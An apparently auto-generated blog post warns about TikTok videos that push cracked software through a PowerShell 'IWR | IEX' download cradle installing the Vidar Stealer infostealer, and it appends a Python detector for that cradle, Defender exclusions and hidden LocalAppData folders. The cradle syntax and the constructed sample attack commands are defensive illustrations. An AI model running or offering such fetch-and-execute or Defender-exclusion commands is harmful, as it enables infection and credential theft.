Cracked Software on TikTok: A Malware Warning
This blog post was automatically generated (and translated). It is based on the following original, which I selected for publication on this blog:
REPORT THIS ACCOUNT – YouTube.
Social media platforms can be dangerous. A recent trend on TikTok involves accounts promoting cracked software for popular applications like ChatGPT, Office 365, and Adobe products. While these videos promise free access to premium tools, they often lead to malware installation.
The Danger of Unverified PowerShell Scripts
The method used in these TikTok videos involves instructing users to open PowerShell via the Run dialog box (Windows key + R) and execute a command that downloads and runs code from the internet. This command typically uses IWR (an alias for Invoke-WebRequest) to download content and pipes it to IEX (an alias for Invoke-Expression), which executes the downloaded code:
IWR <URL> | IEX
This approach is dangerous because it executes arbitrary code on your computer without you knowing what it's actually doing. In many cases, it leads to the installation of malware.
Users often do not examine the scripts they are told to run, and the command itself is designed to bypass security checks. The server hosting the malicious code often verifies that the request is coming from PowerShell by checking the User-Agent header. This prevents direct access through a web browser and forces users to execute the script rather than read it. One could ask whether such a check is an adequate way to prevent this; developments show that it is not.
Analyzing the Malware: Vidar Stealer
Security researchers have analyzed the malware distributed through these TikTok videos and identified it as Vidar Stealer, an information-stealing malware. Vidar Stealer targets a wide range of data, including:
- Passwords stored in web browsers
- Cookies
- Auto-filled data (addresses, bank information, credit card details)
- Browsing history
- Cryptocurrency wallets
The malware collects this information, bundles it up, and sends it to a remote server controlled by the attacker. This stolen data can then be used for various malicious purposes, including identity theft, financial fraud, and account hijacking.
Technical Details: Golang and Obfuscation
The downloaded executable is often written in Golang, a programming language known for its efficiency and cross-platform compatibility. Malware authors sometimes use Golang to make reverse engineering more difficult. The code often employs techniques like Base64 encoding and hidden folders to obfuscate its activities and evade detection by antivirus software.
For example, the malware may create a hidden folder in the local app data directory and add an exclusion to Windows Defender to prevent it from being scanned.
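As an added example (not part of the original post or the analysed sample), the following Python routine flags, in process command-line logs such as Sysmon Event ID 1 or Windows Security 4688, the three behaviours described above: the IWR | IEX download cradle, a Windows Defender exclusion being added, and a hidden folder being created under the local app data directory. The sample command lines are constructed for illustration, and example.invalid is a placeholder domain.

```python
import re

# Constructed sample command lines, in the shape a Sysmon Event ID 1 or
# Security 4688 collector would deliver them. Not captured from a real incident.
SAMPLE_COMMANDLINES = [
    'powershell.exe -w hidden -c "iwr http://example.invalid/x | iex"',
    'powershell.exe Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\\svc"',
    'cmd.exe /c attrib +h "%LOCALAPPDATA%\\svc"',
    'powershell.exe -c "Invoke-WebRequest https://example.invalid/tool.ps1 -OutFile t.ps1"',
    'powershell.exe Get-Process',
]

# Each rule is (name, compiled regex). Case-insensitive, because PowerShell is.
RULES = [
    # A web download piped straight into Invoke-Expression: the cradle from the videos.
    ("download_cradle",
     re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod)\b[^|]*\|\s*(iex|invoke-expression)\b", re.I)),
    # Adding a Defender exclusion so a dropped folder or process is never scanned.
    ("defender_exclusion",
     re.compile(r"\badd-mppreference\b.*-exclusion(path|process|extension)\b", re.I)),
    # Marking a folder under LocalAppData as hidden.
    ("hidden_dir_localappdata",
     re.compile(r"\battrib\b[^\n]*\+h\b[^\n]*localappdata", re.I)),
]


def classify(cmdline: str) -> list[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Return (index, cmdline, matched_rules) for each line that hit at least one rule."""
    hits = []
    for i, line in enumerate(cmdlines):
        matched = classify(line)
        if matched:
            hits.append((i, line, matched))
    return hits


if __name__ == "__main__":
    for i, line, matched in scan(SAMPLE_COMMANDLINES):
        print(f"[{i}] {', '.join(matched)}: {line}")
```

A plain Invoke-WebRequest that writes to a file (line 3 of the sample) is deliberately not flagged by the cradle rule, since only the pipe into IEX is the behaviour the post describes.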
Dynamic Analysis: Unveiling the Malware's Behavior
While static analysis of the Golang code can be challenging, dynamic analysis (running the malware in a controlled environment) reveals its true behavior. Online sandboxes like Any.Run allow researchers to safely execute malware and observe its actions.
Analysis of the Vidar Stealer sample revealed that it:
- Communicates over UDP
- Spawns a child process called "BitLocker To Go"
- Steals credentials from web browsers (Chrome, Opera, Thunderbird, etc.)
- Enumerates installed software
- Communicates with a Telegram account controlled by the attacker
Staying Safe: Protect Yourself from Malware
To protect yourself from malware distributed through social media, follow these guidelines:
- Be skeptical of offers for free software or tools. If something seems too good to be true, it probably is.
- Avoid running PowerShell scripts from untrusted sources. Carefully examine the code before executing it.
- Keep your antivirus software up to date. A good antivirus program can detect and block many types of malware.
- Report suspicious accounts and videos on social media. By reporting malicious content, you can help protect others from falling victim to scams.
Which path do we want to take? With caution and awareness, users can mitigate the risks and enjoy the benefits of technology without compromising their security and privacy.